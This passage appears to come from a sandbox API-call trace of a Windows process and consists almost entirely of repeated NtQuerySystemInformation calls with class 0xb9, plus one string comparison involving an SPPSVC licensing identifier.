SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dda8, Length=0x50, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db00, Length=0x28, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x28, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x28, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x28, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dad0, Length=0x20, ResultLength=0x0) [0238.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dad0, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dad0, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcd0, Length=0x38, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x20, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc50, Length=0x50, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x38, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x28, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x38, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7daa0, Length=0x28, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7daa0, Length=0x28, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x38, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da00, Length=0x20, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x20, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x20, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x20, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x38, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da00, Length=0x20, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0238.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc38, Length=0x50, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x38, ResultLength=0x0) [0238.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0238.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da00, Length=0x28, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x38, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x28, ResultLength=0x0) [0238.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x28, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x38, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x20, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0238.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x20, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x38, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9e0, Length=0x20, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d970, Length=0x20, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d970, Length=0x20, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x50, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x50, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x50, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da80, Length=0x50, ResultLength=0x0) [0238.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x28, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d850, Length=0x28, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x28, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x28, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6f0, Length=0x20, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6f0, Length=0x20, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6f0, Length=0x20, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x38, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x50, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x50, ResultLength=0x0) [0238.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 